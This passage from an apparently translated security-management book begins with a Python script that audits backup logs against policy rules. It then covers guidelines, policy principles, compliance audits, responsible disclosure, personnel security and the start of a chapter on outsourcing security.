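    """Return a list of (rule_code, detail) findings; an empty list means compliant."""
    records = sorted(backups, key=lambda b: b.taken)
    if not records:
        return [("NO_BACKUPS", "the log contains no backups")]
    findings = []
    fmt = "%Y-%m-%d %H:%M"

    # Rule 1: never more than 72 hours without a backup.
    for start, end in _gaps([r.taken for r in records], now, MAX_GAP):
        findings.append(("GAP_72H", f"no backup between {start:{fmt}} and {end:{fmt}}"))

    # Rule 2: a full backup at least every other week.
    fulls = [r.taken for r in records if r.full]
    if not fulls:
        findings.append(("NO_FULL", "the log contains no full backup"))
    for start, end in _gaps(fulls, now, MAX_FULL_GAP):
        findings.append(("FULL_OVERDUE", f"no full backup between {start:{fmt}} and {end:{fmt}}"))

    # Rule 3: everything younger than the retention period must still be restorable.
    for r in records:
        if now - r.taken <= RETENTION and not r.restorable:
            findings.append(("RETENTION", f"backup of {r.taken:{fmt}} lost inside the retention period"))

    # Rule 4: the first backup of each January and June needs a permanent off-site copy.
    # Records are sorted oldest first, so the first hit per month is that month's first
    # backup (assumes the log covers the whole month).
    archived = set()
    for r in records:
        key = (r.taken.year, r.taken.month)
        if r.taken.month in ARCHIVE_MONTHS and key not in archived:
            archived.add(key)
            if not r.offsite_forever:
                findings.append(("OFFSITE", f"first backup of {r.taken:%Y-%m} has no permanent off-site copy"))
    return findings


def _june(day, **kw):
    """Helper for the constructed sample: a backup taken at 01:00 on a day in June 2024."""
    return Backup(datetime(2024, 6, day, 1, 0), **kw)


# Constructed sample log (not real data): a four-day gap after 5 June, full backups
# 17 days apart, one unreadable tape, and no permanent copy of the first June backup.
NOW = datetime(2024, 7, 1, 2, 0)
SAMPLE_LOG = [
    _june(1, full=True), _june(3), _june(5, restorable=False), _june(9),
    _june(12), _june(15), _june(18, full=True), _june(21), _june(24),
    _june(27), _june(30),
]

if __name__ == "__main__":
    for code, detail in audit(SAMPLE_LOG, NOW):
        print(f"{code:13} {detail}")
```

Because the standard names no backup tool, the audit works on any log that can be reduced to these four facts per backup.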
Guidelines
Guidelines are documents in which the verb "should" is usually used. The purpose of guidelines is to interpret the standards for a particular environment, whether a software environment or a physical one. Unlike standards, guidelines change whenever necessary. As their name suggests, these components of policy are not usually used as performance standards, but rather as ways that help to get the job done.

Here is a sample guideline on backups:

"Backups on Unix-based machines should be made with the "dump" program. Backups of systems that are not used 24 hours a day should be made at night, in single-user mode. Backups of systems that run around the clock should be made at the shift change closest to midnight (when the system load is at its lowest). All backups should be read back immediately after they are written, to verify that the written data is correct.

At the first backup of January and of June, a level 0 dump is made. Level 3 backups should be made on the first and fifteenth of every month. Level 5 backups should be made every Monday and Thursday night, unless a level 0 or level 3 backup has been made on the same day. Level 7 backups should be made every other night, except during holidays.

Each week, the system administrator selects a file at random from a backup made during that week, so that the backup staff can restore that file from the backups to make sure the backup procedures are working correctly."

Guidelines are drawn up for specific architectures and particular machines; and they change at shorter intervals than standards, so that they can correctly reflect changing conditions.

Key Points in Developing an Effective Policy
The role of policy (and the associated standards and guidelines) is to help protect the things that, taken together, you consider important. In most cases the policy in use need not be specialized and complicated. Sometimes one simple rule is enough as the entire policy for your environment, as in the following example:

"The use and protection of this system is everyone's responsibility. Only do things that you would want others to do as well. Respect the privacy of other users. If you run into a problem, try either to fix it yourself or to report it quickly. Respect the rules on use of the system. Accept responsibility for what you do and always identify yourself. Enjoy your work."

Sometimes you also need a more formal policy, one reviewed by an official specialist and several security consultants, to protect your assets. Each organization's policy differs from the next, because every organization always has particular considerations that need to be addressed separately in the policies it draws up.

Assign an Owner
Every item of information and equipment that is to be protected should have a designated owner. The "owner" is the person who is responsible for copying, destruction, backup and other aspects of protecting the information. He or she is also one of the people authorized to have access to the information.

The problem with security in many organizations is that there is important information that has no clear owner. As a result, users do not know who makes decisions about storing the information or who sets the rules for access to it. Sometimes information (and equipment too) disappears for a long time without anyone noticing, because nobody is responsible for it and keeping track of it.

Be Positive
People respond better to positive, affirmative statements than to negative statements and prohibitions. Instead of preparing long lists of "don't do this" statements, see how you can phrase the same rules positively. The short policy above could be written as a set of "don'ts" as follows; but see how much easier the earlier statements were to read:

"It is your duty not to allow the system to be misused. Do not do things you would not like others to do. Do not violate the privacy of others. If you find a problem and could not fix it, do not keep it hidden. Do not break the rules on use of the system. Do not try to shift responsibility for what you do onto others; and do not hide your identity either. We hope you don't have a bad time!"

When you write policies, always keep the behaviour of users in mind. They make mistakes and misinterpret things. Your policy should not be such that it treats users as deserving of any punishment whenever they make a mistake.

Beyond that, bear in mind that information systems may contain data about users, and that users may want to keep that information private to some extent. This private information can include e-mail, personal records and job evaluations. So this information must be protected too, although you may not be able to guarantee that it stays private. In short, do not neglect users' needs and feelings.

Concentrate on Education and Awareness
You can include the standards in the training and retraining programme for all users. Every user should have basic security awareness, and that material should then be repeated to them according to a set schedule and format (even if the reminder programme consists only of handing employees a copy of this book!). Trained users are less likely to fall for tricks, and especially for social engineering attacks. Also, if users know why each security measure is in use, they are more likely to be comfortable with the measures and to carry each one out correctly.

A vital part of any security system is granting time and providing support for the further education and training of staff.
There are always new tools, new threats, new methods and new information to learn. If staff spend 60 hours a week hunting for imaginary viruses on personal computers and making backups, they are still not as effective as staff who receive just a few weeks of training a year. Moreover, if they are given the chance to advance and learn on the job, and are allowed to spend every evening and weekend with their families rather than installing software and making backups, they will be happier and more satisfied with their work.

Distribute authority in proportion to responsibilities. A principle of security administration says:

"If you have responsibility for security but have been given no authority to set rules and punish violators, then when a major problem occurs you are the one who takes the blame."

Although the principle above holds in most cases, the real responsibility lies with whoever failed to distribute authority in proportion to responsibilities.

This part contains checklists for the managers and staff who are responsible for security. In it we address the important elements of every organization's security plan, including communication, awareness, training, and adequate investment to support the plan.

Be Sure You Know Your Security Perimeter
When you draw up your policy, you must make sure that you know the different kinds of systems, networks, personnel and storage media that exist within your security perimeter and that you have taken all of them into account. This knowledge defines what you need to worry about. When you draw up policies, you must make sure that you have not left out anything that is in your environment, or that can enter your environment and interact with your information resources.
In past years many organizations defined their IT security perimeter by the same boundaries that walls and fences created; but today organizational environments are rarely that static.

When drawing up your policies, you should take into account points such as the following:

• Wireless networks that are used in buildings or connected to site equipment can be used by outsiders with directional antennas, or by parking a car outside the building and using a laptop inside the car. Wireless networks must be configured and protected so that their sensitive information cannot be detected off-site and so that attackers' malicious code is prevented from entering them.

• Computers that the organization's employees use at home may be exposed to intrusion, theft and malicious code, and may also be used contrary to the organization's policies (for example, to run an independent business or to host a web server with questionable content). The policy must specify how these computers are to be used, protected and audited.

• Storage media are usually portable and compact. If someone puts a copy of the company's financial records on a CD or DVD for use at a remote site, what happens if that medium is stolen or misplaced? Policies must specify who may take a medium off the premises, by what methods the information must be protected (which includes encryption), and what must be done if the medium is stolen or lost. It must also be spelled out in detail how previously used media are to be destroyed so as to reduce the risk of disclosing the information on them.

• When you are away from your physical location, you can use portable computers and PDAs to reach information. These devices can store sensitive information such as IP addresses, telephone numbers and passwords. These systems must have a minimum level of security, for example through encryption or at least tokens for providing physical security. Users must be aware of, and trained in, the risks of theft and eavesdropping.

And try to have suitable answers to the following questions:

• Which policies address people who bring their PDAs and laptops to the workplace for meetings or simply on visits? What are the rules for connecting them to networks, telephone lines, printers and other workplace equipment?

• What considerations have been adopted for taking computers or storage devices off-site (for example, for repair)? What happens if there is sensitive information on the disks? What guideline has been adopted for leased equipment that is returned to its owners?

• If business partners or contractors have access to your equipment, whether at your workplace or their own, who will protect the information? How do you prevent the inadvertent mixing of your sensitive data with theirs?

• What policies address information that has been sent to your organization under "trade secret" certification? Who is responsible for protecting the information, and where may it be kept?

• What policies govern non-computer information processing equipment? For example, what policies have been drawn up for the use of printers, copiers and fax machines? (Bear in mind that sensitive information on paper is just as important as sensitive information on computers.)

Thinking about all of these issues before any problem occurs helps to prevent that problem from occurring. Writing meaningful statements into the security policy helps everyone to understand the concerns and to apply the right preventive mechanisms.

Pick a Basic Approach to Security Issues
First decide which of the following models you want to follow: "Whatever is not explicitly prohibited is permitted" or "Whatever is not explicitly permitted is prohibited." Then decide how you want to define the other cases. The first may suit a fairly open environment such as a university, whereas the second is better suited to a commercial institution such as a bank.

Defense in Depth
When you plan your policy and countermeasures, do not stop at a single layer; build several overlapping and independent levels of protection to defend against different threats. Then add monitoring and auditing to the set, to make sure that the policies adopted actually work in practice. An attacker is far more likely to slip past a single set of defenses than past, say, three defensive stages plus an alarm system. [82]

82 See the following source, written by Tom Kellermann: "The 12 Layer Matrix: Building a CyberFortress (2003)": http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&ESecurity/E-Finance&Tools

Enforcement and Security Audits
Drawing up a policy is not enough on its own; it must be checked regularly whether the adopted policy is being applied correctly and, if it is, whether it is adequate and correct. The word audit has taken on new meanings and is currently used at least in the senses of financial audit, audit trails (using log files), security audit of a system, and policy compliance audit.

A policy compliance audit consists of the actions taken to determine whether the standards set out in the policy are being met and, if they are not, why not. Standards usually also supply criteria and methods by which they themselves can be measured, which an auditor can use to measure whether or not the standard is being met. If standards have not been met, this may be the result of any combination of the following:

• Personnel shortcomings: insufficient training and lack of the necessary skills; overwork; lack of the necessary motivation;
• Material shortcomings: shortage of adequate equipment; insufficient or unsuitable resources; inadequate maintenance and support; excessive use or load;
• Organizational shortcomings: lack of accountability; overlapping responsibilities; unclear, uncoordinated and confusing division of work;
• Policy shortcomings: unforeseen risks; incomplete or missing policies; overlapping policies; and mismatch between the policy and the environment.
The key point about the list above is that policy problems cannot be put down to errors by users or administrators. Even insufficient training or excessive overtime is generally not within the administrators' control. A compliance audit should therefore not be seen as an unwelcome process; rather, it should be viewed as a collective effort to identify problems, find and reallocate resources, refine policies and standards, and raise awareness of security needs. As in all other areas of security, a team approach is the most effective one in almost all circumstances here too. If the matter is managed properly, staff can achieve the desired security. The key is to help them do their jobs, rather than placing ourselves on the other side of the table, opposite them.

The Problems with Security Based on the Attacker's Ignorance
In traditional security mechanisms, which derived mainly from military intelligence organizations, there was a concept called "need to know." Information was compartmentalized, and each person was allotted just as much of it as they needed to carry out their duties. In environments where particular pieces of information are sensitive, or where inferential security must be maintained, this policy makes particular sense. If three pieces of information together could produce a damaging result, but nobody has access to more than two of those pieces, then security can be said to be assured.

In a computing environment, applying the "need to know" concept is usually not appropriate. This is especially true when you have based your security on some technical matter being unknown to attackers. Relying on attackers' ignorance can harm your safety.

Keeping bugs or features confidential as a way of protecting against them is also a weak approach to security. Software authors commonly place back doors in their programs that allow them to gain access privileges without supplying a password. At other times, system bugs with profound security implications are left in place because the manager assumes nobody knows about them. The problem with these approaches is that the problems and features in a program are very likely to be discovered, whether by accident or by a determined intruder. Keeping bugs and features hidden means that they go unobserved and naturally remain unfixed. So once they are discovered, the existence of the problem leaves all similar systems vulnerable to attack by the people who discovered it.

Consider an environment in which management decides to keep the manuals away from users so that they cannot learn about commands and options that might be used to compromise the system. In such a situation managers may believe that they have increased their security, but in reality they have not. A determined attacker can find these documents elsewhere, through other users or other offices. Plenty of these documents are available no farther away than the bookshop nearest to any office! Management cannot close off every avenue for learning about the system. What is more, because local users cannot see the documentation and learn about more efficient options, they may get very little benefit from the machines. Their motivation may also be weakened, because the implicit message management sends by doing this is "We do not fully trust you to be a responsible user." Beyond that, if someone does start abusing the system's commands and features in such a situation, management may not have enough ability to recognize and combat the problem; and if something happens to the one or two users who were allowed access to the documentation, nobody with the necessary experience or knowledge is left to help when problems arise.

The value of keeping algorithms secret, for example a proprietary encryption algorithm, is also debatable. Unless you are a cryptography expert, you cannot judge the strength of the algorithm. The result may be a mechanism with serious flaws. An algorithm that is kept secret is naturally not examined by others, and so anyone who finds a flaw in it will be able to gain access to your data without your knowledge.

Similarly, keeping the source code of the operating system or of application programs confidential provides no guarantee of security either. Those who have decided to get into your system will find security holes from time to time, regardless of whether or not they have the source code. [87] But without access to the source code, users cannot examine it systematically to find its problems; and so, although hiding the source code may bring a small advantage, security should not depend on that secrecy.

Attitude towards security is a key point. If the confidentiality of defensive measures that rest on secrecy is breached, they all lose their value. Worse still, continued secrecy prevents or limits auditing and monitoring of the program, and it may never be possible to tell whether that secrecy has been breached or not. Greater security can be achieved with algorithms and mechanisms that are inherently strong, even if the attacker knows about them. The fact that you use strong mechanisms that everyone knows about may discourage an attacker and lead them to seek the thrill of breaking in somewhere other than your systems. If you hide your money in a locked drawer, it is safer than when nobody knows that you keep your money in a mayonnaise jar in the refrigerator!
Responsible Disclosure
The objection raised to "security based on the attacker's ignorance" is not meant to say that as soon as you find security holes you should broadcast them widely to the public. There are major differences between secrecy and prudence. If you discover a security hole in distributed or widely used software, you should quietly and as quickly as possible notify the developer of that software. We also recommend that you notify one of the FIRST teams (which are described in Appendix 4). These organizations can help developers to prepare patches for the discovered security holes and to make sure that the patches have been distributed and are being applied correctly.

If you trumpet the security hole in a piece of software, you cause problems for everyone who uses that software and cannot fix its bugs. In the Unix environment, many users have become accustomed to making changes to the source of a program in order to fix its bugs.

Unfortunately, not everyone has that ability, and many customers must wait weeks or months for updated software to be released by the vendor concerned. Some sites may not even be able to upgrade their software, either because they do nothing with the computer beyond switching it on and working with the software they need, or because their software has been certified on the basis of its existing settings and so they cannot change its configuration. Some systems may be run by people who lack the skill needed to apply patches, and other systems may not be in active use or may be outside the organization's support. Always act responsibly. It is better to distribute a patch to staff without explaining the underlying vulnerability than to hand attackers details of how to break into unpatched systems.

87 Unless you develop every part of a piece of software yourself, on your own workstation, various people may have had access to the source code, and there is a chance that the source code will be disclosed accidentally or deliberately.
We have seen many cases in which an expert has reported a major security flaw to a very public mailing list. Although this person's aim was to get a quick fix from the vendors, the result was a wave of attacks on systems whose administrators did not have access to that mailing list or were unable to apply the fix provided.

If no patch yet exists for recent vulnerabilities in your system, posting their details to a mailing list will not only put many other sites at risk; if an intruder uses that flaw to break into other sites, legal action over the resulting damage may also be taken against you. [88] If you are concerned about your own security, remember that you are part of a community. In a community you should also look to strengthen the security of others, and remember that one day we too may need others' help.

Summary of the Discussion of Prevention and Policy
The key to successful risk assessment is identifying all possible threats to the system and defending against the attacks that you think are more likely to occur.

Given these limitations, you must approach computer security with priorities that you have thought through fully in advance, because you cannot provide protection against every possible threat. Sometimes, instead of preventing a problem from occurring, you should let it happen and then deal with its effects. For example, faced with a power outage, circumstances may be such that letting the systems shut down and restart costs you far less than buying a UPS.

88 Although we have not yet seen such a case occur, several lawyers have told us that they expect their clients to ask them to do this.
There are other cases for which you may have no particular idea how to defend (such as an invasion by an alien from space); or which, being highly improbable, are very hard to defend against (such as a nuclear explosion 200 metres from your data centre); or which are too catastrophic to be countered (such as your manager deciding to convert all the Unix machines to a better-known operating system!). The key to good management is knowing the things you are worried about, and how worrying each of them is.

Weigh the decision about what you want to protect, and the costs you might pay to prevent its loss, against the costs of repairing the damage from an incident. Then, on the basis of this table and of a prioritized list of nearly all vital needs, make your decision about security activities and measures. Make sure that this analysis takes into account not only computers but other equipment and assets as well; and do not forget that backup tapes, network connections, terminals and your documentation are all parts of the system, and each of them can inflict damage on the system as a whole. The health of staff, the company's buildings, and its reputation and public image are also very important and must be considered in the calculations for security plans.

The fact that humans are the weakest link in security does not mean that protecting the other weak points should be forgotten.
Humans are unpredictable, but abusing a modem that has no password is far simpler than persuading a key employee to accept a bribe. So wherever possible we should use technology-based defensive mechanisms, and improve the security of our personnel by training users and staff. In addition, we rely on defense in depth: we use multiple defensive stages, such as backups, so that if one layer fails to provide the necessary defense we do not suffer fundamental losses. For example, we buy a backup UPS system; or, although there is a strong lock on the building door, we put a separate lock on the door to the computer room. The truth is that an attacker can overcome these combinations too, but we raise the cost of doing so; so high that we may be able to convince the attacker that getting past our system's barriers is not worth the trouble. At the very least, you can hope to have slowed the attacker down enough that monitoring and alarm systems alert you to the intrusion before important assets are harmed.

Chapter Six
Personnel Security

Overview
This chapter briefly examines those security issues that originate inside the organization. Personnel security issues, from hiring and dismissal to training and awareness, play a vital role in the organization's preventive and defensive performance.

Risks Originating from Personnel: A Hidden Threat to the Organization
Consider a few of the newsworthy incidents caused by employees of organizations over the past few years:

• Nick Leeson, an investment trader at the Singapore branch of Barings Bank, and Toshihide Iguchi, of the New York office of Daiwa Bank, both made high-risk investments that lost considerable amounts of their banks' capital; but instead of admitting the loss, they altered the computerized account records, and in doing so in effect put even more money into the gamble to make up for the earlier losses; and in the end they were identified only after inflicting more than one billion dollars of losses on each of the two banks. As a result of these actions, Barings was forced to declare bankruptcy, and Daiwa permanently lost its licence to do business in the United States.

• In the United States, some organizations and individuals, despite holding valid security clearances from the CIA, the FBI and the military, passed classified information to Russia and Israel (such as Aldrich Ames, Jonathan Pollard, Robert Hanssen and Robert Walker). Despite multiple security controls, these individuals were able to carry out damaging espionage, in some cases for more than a decade.

• John Deutch, director of the CIA during Bill Clinton's presidency, took classified government information home from the agency and stored it there on computers that were configured for "unclassified" use. While the classified information was on those computers, they were also used to visit vulgar and indecent websites, sites that could have used both publicly known, published vulnerabilities and new, undisclosed ones to attack visiting systems. Although Deutch had broken numerous rules and laws in this matter, no action was taken against him, and he was pardoned by Clinton on the last day of his presidency.

If you examine these cases and the other computer crimes and offences of the past few decades, you will see one common feature: all of them were committed by people. The intruders were people; computer viruses were written by people; and the passwords were stolen by people.

"Personnel security" covers everything that relates to personnel: hiring, training, monitoring behaviour, and sometimes dismissal. Statistics show that the most important group of perpetrators of serious computer crime are people who either have legitimate access to the data or had it in the recent past. Some studies show that more than 80% of incidents are caused by such people. An important part of a good security plan is therefore the management of personnel with privileged access.

People contribute to computer security problems in two ways. Some, by not following security procedures, by forgetting security considerations, and by not being aware of the consequences of what they do, unwittingly contribute to security incidents. Others knowingly violate controls and procedures in order to help an incident happen or to cause it by themselves. As we noted earlier, in most cases the people who knowingly play a part in your security problems are your own employees (or were until recently): people who know the controls and know what information of what value is likely to be found where.

While administering, say, a Unix system, you may encounter people from both groups.
The controls and mechanisms involved in personnel security are numerous and varied, and discussing all of them would take an entire book, so we give only a summary of the most important ones. Establishing personnel policies cannot prevent security breaches, but it does reduce the security threats your company faces from its own employees.

Security in the hiring process

Background checks
When you hire new staff, check their backgrounds. You may have asked applicants to fill out employment forms, but then what? At a minimum, check every reference each applicant has given, so that you learn about the applicant's past, including the reasons for leaving previous jobs. When reviewing records, remember to scrutinize the dates of previous hirings and departures and the gaps between them. You should also verify every certificate and academic degree, because it has often happened that people have claimed degrees from reputable universities when those universities had no record that the person had completed even a single course! Some people may also present degrees from universities that are little more than a post office! Bear in mind that someone who resorts to lying to get a job cannot be employed in a sensitive position.

Intensive investigations
In some cases you may want a more thorough investigation of applicants' character and background. Depending on the level of the position the applicant will hold and the access he or she will have to sensitive systems and data, you may want to:

• Use a specialized investigative agency to check people's backgrounds;
• Ask applicants for a certificate showing that they have no criminal record;
• Check applicants' credit records to see whether they have had large personal debts that they could not handle. If you find something, discuss it with the applicant. People who are in debt should not be denied work, because then they would never be able to repay their debts. Still, it should not be overlooked that employees under financial pressure are more likely to behave improperly at work.
• Consider a polygraph test for the applicant (if the law allows it). Polygraph tests are not always accurate, but they can be useful if you are considering the applicant for a sensitive position.
• Ask the applicant to provide a bond for the position.

In general, performing all of these steps is not recommended for every hire, but you should carry out additional checks for employees who will work in positions that require a high level of trust and that carry special access, such as hiring or dismissing staff. We suggest telling the applicant that you intend to perform these checks and obtaining his or her consent. Although this is not required, it makes the checks easier to carry out and lets the applicant know that you are careful and serious about hiring. In some cases you need the applicant's explicit permission to conduct these investigations.

Periodic rechecks
After you have completed your checks and hired the applicant, you should repeat some of the checks periodically. Then compare the results of the current and previous checks to identify what has changed. Some changes may call for deeper investigation.

For example, if you have an employee who is in charge of your accounting system, including producing computer-generated checks for creditors, you may also need to check the balances of his or her bank accounts at short intervals. If your recheck takes place every two years and you find that an employee's behavior falls outside the established norms, you will normally decide to investigate further.

Initial training
Your security concerns about an employee should not stop once he or she is hired. Every computer user must receive basic training in security policy. At a minimum this training should cover proper procedures for choosing and using passwords, physical access to computers and networks (who is allowed to connect to equipment, and how), backup and retention procedures, policies for dialing in to the company's computers (by telephone), and policies on disclosing information over the phone. Executives should not be exempted because of their position: they are at least as likely as other staff, if not more so, to choose weak passwords and make other mistakes. They too must demonstrate their commitment to security, because security awareness in organizations flows from the top down, not the reverse.

Training should include written materials and a copy of the computer-use policy, and should cover topics such as proper and improper use of computers and networks, personal use of computing equipment (during and after working hours), policies on the ownership and use of electronic mail, and policies on bringing software and data in and taking them out. The penalties for violating the rules should also be explained during training.

All users should sign forms acknowledging that they have received this information and accept its restrictions. These forms should be kept for years, so that if the question later arises whether the employee was given prior notice of what the organization is permitted to do with respect to him or her, documentary proof can be produced.

Ongoing training and awareness
Users need to receive fresh information about security and proper computer use at regular intervals. This retraining gives users a good opportunity to be reminded of current threats and their consequences, and creates a forum for exchanging views and raising concerns.

You should give employees adequate opportunity for current and future training, for example by encouraging attendance at professional conferences and seminars, subscriptions to professional and trade periodicals, and access to reference books and other training materials. Employees should be given enough time to use these materials and the incentives to learn the skills they need.

Alongside periodic training, you may want to use more varied methods to keep the effort going, such as putting up posters or notices about best practices, announcing daily and weekly slogans, designating a "Security Day", or holding meetings and seminars so that the importance of security does not fade from general view.

Of course, the size and nature of the organization, the level of threat and potential loss, and the number and behavior of staff are all factors to take into account when drawing up these plans. The costs of awareness activities should also be planned for in advance and included in the organization's budget.

Performance reviews and monitoring
Your employees' performance should be reviewed periodically. In particular, employees should receive credit and rewards for professional growth and good performance. At the same time, problems should be identified and resolved constructively. You should encourage your employees to increase their abilities and deepen their understanding.

You should also prevent situations in which staff develop destructive feelings such as exhaustion from overwork, being disrespected, or being ignored.
Such an atmosphere in the workplace can lead staff to stop caring about the organization's interests. Staff may also leave your organization for better job opportunities or, worse, may take part in disruptive activity against you out of revenge. Overtime should be an exception, not the rule, and all employees, especially those in sensitive positions, should be given adequate holidays and time off. Overtime wears employees out, and fatigue raises their error rate, causes them to miss or overlook problems, and takes an emotional toll. It also creates stress in their private lives, because their families and loved ones would like to see them during the day from time to time. Employees who are overstressed and exhausted are more likely to become disgruntled, and that obviously does nothing to improve security.

In general, staff with relatively high access privileges should be watched for signs of heavy stress, personal problems, and other difficulties. Recognizing these problems and, where possible, helping to resolve them is the least that common humanity requires. It is also a way of protecting the organization's valuable resources: the staff themselves and the resources to which they have access.

Auditing access
Make sure that access to equipment and information can be audited. Also make sure that everyone who has any kind of access knows that these audits exist. Many cases of computer abuse occur because the perpetrator believes that no one will notice what he is doing. If an offender knows that his activities are being logged, he may give up his harmful plans. Auditing does not mean only reviewing computer logs: building entry and exit records, records of electronic lock usage, and closed-circuit television tapes can all be reviewed to promote greater accountability.
Even so, you should be careful about the effects of covert monitoring. People resent not being trusted and being watched in secret, and if they discover that they are under surveillance they may become angry and even react in extreme ways. In some jurisdictions, for example, labor law and employment contracts have exposed employers to heavy civil litigation.

If monitoring is very close, simply informing employees that they are being monitored is not enough. Some studies have shown that employees under intense monitoring are less productive and behave worse. This certainly holds if, for instance, you monitor the length of employees' telephone calls, every website they visit, or how often they take breaks. The best policies are those developed with the agreement and cooperation of employees, and with human resources staff (if you have such a department) present when they are drafted.

Least privilege and separation of duties
Pay close attention to the principles of least privilege and separation of duties. These principles have proven their worth over time and should be applied wherever they are feasible in your operations.

Least privilege
This principle says to give each person the minimum access needed to do the job. This restricted access covers both logical access (access to user accounts, networks, and programs) and physical access (access to computers, backup tapes, and other peripherals). If every user has an account on every system and physical access to every resource, then all users are roughly equivalent in the level of threat they pose.

Separation of duties
This principle holds that you should carefully separate people's duties, so that those responsible for watching for misuse are not themselves in a position to misuse the systems. Giving all security functions and audit responsibilities to a single person is therefore dangerous. It can lead that person to violate security policy and commit prohibited acts while no one but that person reads the audit reports on those acts, so the violation stays hidden and is likely to be repeated over time.

Limit dependence on key employees
No one in an organization should be irreplaceable, because no one lasts forever. If an organization's survival depends on the daily performance of one key employee, that organization is unquestionably at risk. To maintain security, organizations should have written policies and plans for events such as the illness or sudden dismissal of key people, and should put those plans into practice.

In one case reported to us, a company with about 100 employees spent more than 10 years developing its own customs accounting and order import system. The system was written in a programming language that was not easy to read, and the company that had produced it went out of business shortly afterwards. Only two people in the company understood how the system worked: the manager of management information systems (MIS) and the manager's programmer. These two were responsible for making changes to the accounting programs, preparing annual reports, repairing broken computer equipment, and even making the backups (which were stored off the company's premises, in the MIS manager's office).

What would have happened if the MIS manager and the programmer had been killed one day in a road accident? What if the MIS manager had been offered a better job at several times the salary? What if the programmer, unable to advance because the company needed to keep him in his post, had become discouraged and angry about working there?

Key personnel becoming irreplaceable is one of the serious drawbacks and costs of computer systems, and senior management rarely pays enough attention to it. It is one more reason to use off-the-shelf software and to have written policies and procedures, so that a newcomer can readily take over from a predecessor.

Absence and departure
People sometimes leave a job of their own accord (for a better offer, say) and sometimes involuntarily (through death or physical injury, for example). Over shorter periods, people also go on trips, or may be away from the office for a few days for family or personal reasons. In each of these cases there should be a defined set of actions and procedures for keeping work flowing during the absence or after the departure. These can include steps such as suspending accounts (though not in the case of an absence), reassigning the person's work to other staff, changing sensitive passwords, checking voicemail boxes, or revoking access to all of these systems.
In some environments these measures may have far-reaching effects. At a university, for example, graduates may be allowed to keep using their accounts for months or years after graduation (for instance to stay in touch with faculty). In an office, likewise, if an employee is travelling or out sick (for just a few days), his or her accounts should not be locked and passwords should not be changed.

In many cases a departure is very sudden and unexpected. In such a case someone may be present at the departing employee's workplace to make sure the locks are changed, and a security guard may escort the employee out with a box containing the personal belongings from his or her desk drawers. The account has already been deleted, all system passwords have been changed, and the office telephones are no longer connected. This kind of separation management is very common in the financial services industry and is regarded as one of the organization's functions. The staff of this function are usually employees who were hired of their own accord under contracts stating that they may be made responsible for carrying out such measures. In all circumstances, use common sense. You should decide precisely what the access policy should be and state it clearly to employees and to those responsible for implementing it.

Security considerations for other people
Other people who have access to your system may not always have your interests and concerns at heart, or may be careless about the harm you could suffer. There are many reports of such incidents at home: children's playmates who have introduced viruses onto computers, and married people who have searched disks to gather evidence of a spouse's infidelity. In business settings too, there are reports of cleaning staff and temporary office workers caught sabotaging or spying on company computers.
You cannot choose your parents, but you can have a say in who is allowed access to your company's computers. Visitors, maintenance staff, contractors, vendors, and others may all have temporary or semi-permanent access to your offices and systems. Consider how everything we have discussed so far applies to these people. Finally, remember that no one from outside the organization should have unrestricted physical access to your computer and network equipment.

People whose records should be checked from time to time include:

• System operators and administrators;
• Temporary employees and contractors who have access to the system;
• Maintenance and cleaning staff;
• Security guards;
• Messengers and supply staff who have routine or unsupervised access to the systems;
• Consultants;
• Auditors, examiners, and other financial staff.

All staff with access to the system should receive the necessary training in security and loss prevention, and the training should be repeated periodically. Staff should also be kept informed of incident response procedures and of the penalties for violating security rules.

Do not forget the threats that come from your own family. Whether you share a home computer with the whole family or occasionally bring your children to the office for a visit, it is important that they understand that the computer you work on is not a toy. They should learn not to touch sensitive business equipment. Password-protected screen savers are a suitable precaution for this purpose. In addition, teach your family members that they need not talk to anyone about your work environment or your computer-related business.

Chapter Seven
Outsourcing Security [100]

[100] Outsourcing: handing security over to resources outside the organization.

Overview
Using outside resources is a good option for managers of public, private, and non-profit enterprises who are concerned about their organization's ability to respond to security threats, but the firm chosen to do the work must be selected carefully and its performance must be monitored regularly. This chapter describes some of the advantages and disadvantages of outsourcing security, and sets out a series of questions that should be answered before finalizing negotiations with new security partners.

Outsourcing: an alternative to the organization's unwanted entry into new fields
After reading the preceding chapters, you may have concluded that all your policies and plans are in good shape, or that there are still things you want to do, or you may be daunted by the sheer amount of work. If you are in the last group, do not assume that the job is impossible for your company. There are other ways to develop policies and plans and to provide security in your organization: using outside resources, consultants, and contractors. Even if you run a small one-person business at home or a small company that depends on information and communication technology, you can benefit from shared expertise by contracting with security firms that are able to employ a trained, experienced team not tied to any one organization, share its capabilities among the clients who need them, and put its skills at their disposal.

On the other hand, if you have strong IT skills, you can set up a company and offer your capabilities to those who need such services. Firms of this kind offer significant job opportunities, because there are not enough information security specialists in the world to meet all the needs of industry and government worldwide. [101] As a result, in the West there has been an explosion in the use of consultants and outside resources to help organizations of all sizes meet their information security needs. As with many other services that can be outsourced, some firms here are first-rate, some are highly specialized in their field, and some perform poorly. Unfortunately, the state of this field is such that the weaknesses of proposals prepared by novices cannot be spotted at a glance.

[101] One consequence of the shortage of trained security specialists is a shortage of staff and resources to support information security education in training centers and universities. Governments and industry claim that this field is very important, but they have failed badly at allocating resources to help build it.

If you have not yet been able to develop your disaster recovery and incident response policies and plans because your organization has no unit dedicated to security planning, we recommend getting outside help. Several international organizations assist developing countries in areas related to information technology. Where such expertise is available, it can be very valuable both for short-term support and for building longer-term capacity (training and awareness).

Developing an action plan
The first step is to decide which services you need:

Will you set up the security function as part of your own organization, with your own staff? If so, you may only need consultants to review your operations and make sure nothing important has been overlooked.

Perhaps you have experts of your own but are concerned about their limited time or their ability to respond properly to a crisis.
In that case you can look in the market for a firm that will place a few contractors (full-time or part-time) in your offices. You may also want to use a remote monitoring and response firm simply to watch over your security and help you if something goes wrong.

Perhaps you cannot take on a full-time employee, or do not need one. In that case a contract with a full-service consulting and monitoring firm may meet your needs and also be more cost-effective.

The key in each of these cases is to know what your needs are and which of them each service addresses. That is not always simple, because until you have gained experience with security issues and know your environment well, you do not know what your real needs are.

Choosing a vendor
Your success in outsourcing security to third parties depends largely on the organizations or individuals you choose for the job.

Get a referral and insist on references
Because consulting firms vary so widely, one of the best ways to choose one is to ask an organization you know that is similar to your own. Unfortunately, a good referral cannot always be found. Many organizations found their consulting firm at a trade show, or first read about it in a news article, or decided to use its services after a simple telephone call through an intermediary.

Clearly, a third-party security firm is in a position to do serious damage to your organization. Even if an outside security firm is thoroughly honest and competent, if you trust it with a task and the task is done poorly, you may not notice the problem until its consequences surface months later, perhaps after your relationship with the firm has ended.
